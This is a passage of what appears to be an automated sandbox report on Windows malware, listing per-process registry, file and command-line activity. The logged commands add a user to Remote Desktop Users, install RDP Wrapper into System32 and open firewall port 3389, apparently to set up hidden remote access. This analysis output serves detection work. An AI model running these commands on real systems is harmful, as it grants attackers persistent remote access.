]
},
"first_seen": 1574704400.390499,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\net.exe",
"process_name": "net.exe",
"pid": 3632,
"summary": {
"command_line": [
"C:\\Windows\\system32\\net1 localgroup \"Remote Desktop Users\" ontar \/add"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704390.109249,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\sc.exe",
"process_name": "sc.exe",
"pid": 3684,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\sc.exe.mui"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY"
]
},
"first_seen": 1574704399.765501,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\System32\\netsh.exe",
"process_name": "netsh.exe",
"pid": 3124,
"summary": {
"file_recreated": [
"\\Device\\Http\\Communication",
"\\Device\\KsecDD"
],
"regkey_written": [
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\LanguageList",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100"
],
"dll_loaded": [
"C:\\Windows\\system32\\bcryptprimitives.dll",
"RASMONTR.DLL",
"WSHELPER.DLL",
"RpcRtRemote.dll",
"kernel32.dll",
"CRYPTBASE.dll",
"C:\\Windows\\system32\\rsaenh.dll",
"NSHIPSEC.DLL",
"HTTPAPI.dll",
"API-MS-WIN-Service-Management-L2-1-0.dll",
"HNETMON.DLL",
"API-MS-WIN-Service-Management-L1-1-0.dll",
"API-MS-Win-Core-LocalRegistry-L1-1-0.dll",
"IFMON.DLL",
"RPCNSH.DLL",
"ole32.dll",
"CRYPTSP.dll",
"WWANCFG.DLL",
"NETIOHLP.DLL",
"NETTRACE.DLL",
"API-MS-WIN-Service-winsvc-L1-1-0.dll",
"ADVAPI32.dll",
"NSHWFP.DLL",
"NAPMONTR.DLL",
"NSHHTTP.DLL",
"WHHELPER.DLL",
"PEERDISTSH.DLL",
"WCNNETSH.DLL",
"GPAPI.dll",
"FWCFG.DLL",
"AUTHFWCFG.DLL",
"P2PNETSH.DLL",
"DOT3CFG.DLL",
"USER32.dll",
"WLANCFG.DLL",
"DHCPCMONITOR.DLL",
"userenv.dll"
],
"file_opened": [
"C:\\Windows\\System32\\en-US\\napipsec.dll.mui",
"C:\\Windows\\System32\\EAPQEC.DLL",
"C:\\Windows\\System32\\en-US\\eapqec.dll.mui",
"C:\\Windows\\System32\\napipsec.dll",
"C:\\Windows\\System32\\rsaenh.dll",
"C:\\Windows\\System32\\tsgqec.dll"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79619",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\NapAgent\\LocalConfig",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\NetTrace",
"HKEY_CURRENT_USER\\System\\CurrentControlSet\\Control\\NetTrace\\Session",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79617",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\NetTrace\\Scenarios",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623",
"HKEY_LOCAL_MACHINE\\System\\Setup",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79621",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79623",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enroll\\HcsGroups\\(Default)",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\UI",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\iphlpsvc\\Config",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enroll\\HcsGroups",
"HKEY_CURRENT_USER\\SYSTEM\\CurrentControlSet\\Control\\NetTrace"
],
"file_exists": [
"C:\\Windows\\System32\\fveui.dll",
"C:\\Windows\\System32\\napipsec.dll",
"C:\\Windows\\System32\\QAGENTRT.DLL",
"C:\\Windows\\System32\\EAPQEC.DLL",
"C:\\Windows\\System32\\dnsapi.dll",
"C:\\Windows\\System32\\tsgqec.dll",
"C:\\Windows\\System32\\p2pcollab.dll",
"C:\\Windows\\System32\\DHCPQEC.DLL"
],
"mutex": [
"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"
],
"guid": [
"{432a1da5-3888-4b9a-a734-cff1e448c5b9}",
"{00000323-0000-0000-c000-000000000046}",
"{00000146-0000-0000-c000-000000000046}",
"{07a1127b-18cc-422a-b988-e892600fcc74}",
"{ea4a0a43-1c8f-4c7b-a4b1-28ecbd96ba8c}",
"{bf0ec44a-c6ae-4bc5-a0ca-d33fa6c9c6c2}",
"{eb082ba1-df8a-46be-82f3-35bf9e9be52f}"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.44.3.4!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Service\\PolicyRefreshInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\DiscoveryProviderDllPath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseHostnameAsAlias",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Component Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Service\\Enable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Component Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Setup\\SourcePath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Description",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft RSA SChannel Cryptographic Provider\\Type",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxPendingOffers",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseOldHostResolutionOrder",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.47.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Config Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Version",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Tracing Level",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Enabled",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\RefreshDllName",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\DoNotUseSSL",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\TransportDllPath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxSimultaneousUploads",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\qagentrt.dll,-10",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Config Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\ServerRole",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\crypt32\\DebugHeapFlags",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\GpSvcDebugLevel",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxSimultaneousDownloads",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\NetTrace\\DebugFlags",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\BlockSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Component Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\SecurityService\\DefaultAuthLevel",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\RepubQuorumSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\TransportDllPath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledSessions\\MachineThrottling",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Cryptography\\PrivateKeyLifetimeSeconds",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SESSION MANAGER\\SafeProcessSearchMode",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\LdapClientIntegrity",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\MinBackoffWindow",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced Cryptographic Provider v1.0\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Registration Date",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.67.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxPendingDownloads",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\NumBlocksPerSegment",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Component Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Description",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Config Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{00000134-0000-0000-C000-000000000046}\\ProxyStubClsid32\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\CryptoAlgo",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DevicePath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Registration Date",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPHLPSVC\\config\\Connectivity_Platform_Enabled",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\ClientAuth",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Config Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Smart Card Crypto Provider\\Type",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\p2pcollab.dll,-8042",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enable Tracing",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.67.1.2!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\UserenvDebugLevel",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Upgrade",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Cryptographic Provider v1.0\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS and Diffie-Hellman Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Registration Date",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dnsapi.dll,-103",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\Restricted\\Seed",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\System32\\fveui.dll,-844",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\System32\\fveui.dll,-843",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\Extensions\\RemoteRpcDll",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\ForceRoamingDetect",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Description",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Description",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledProcesses\\F6C4EC9A",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Cryptography\\PrivKeyCacheMaxItems",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledSessions\\GlobalSession",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Cryptography\\PrivKeyCachePurgeIntervalSeconds",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Registration Date",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider\\Image Path",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft DH SChannel Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\RefreshProcName",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TCPIP6\\Parameters\\DisabledComponents",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\PlumbIpsecPolicy",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider\\Type"
]
},
"first_seen": 1574704395.156124,
"ppid": 3128
},
{
"process_path": "C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"process_name": "RDPWInst.exe",
"pid": 3128,
"summary": {
"file_created": [
"C:\\Windows\\System32\\rdpwrap.ini",
"C:\\Windows\\System32\\rdpwrap.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions"
],
"file_opened": [
"C:\\Windows\\System32\\termsrv.dll",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\rdpwrap.ini"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService",
"HKEY_LOCAL_MACHINE\\Software\\CodeGear\\Locales",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\AddIns",
"HKEY_CURRENT_USER\\Software\\CodeGear\\Locales",
"HKEY_CURRENT_USER\\Software\\Borland\\Locales",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
"HKEY_CURRENT_USER\\Software\\Borland\\Delphi\\Locales",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core"
],
"file_written": [
"C:\\Windows\\System32\\rdpwrap.ini",
"C:\\Windows\\System32\\rdpwrap.dll"
],
"file_exists": [
"C:\\Windows\\System32\\rdpclip.exe",
"C:\\Windows\\System32\\",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\rdpwrap.ini"
],
"command_line": [
"netsh advfirewall firewall add rule name=\"Remote Desktop\" dir=in protocol=tcp localport=3389 profile=any action=allow"
],
"file_read": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\rdpwrap.ini"
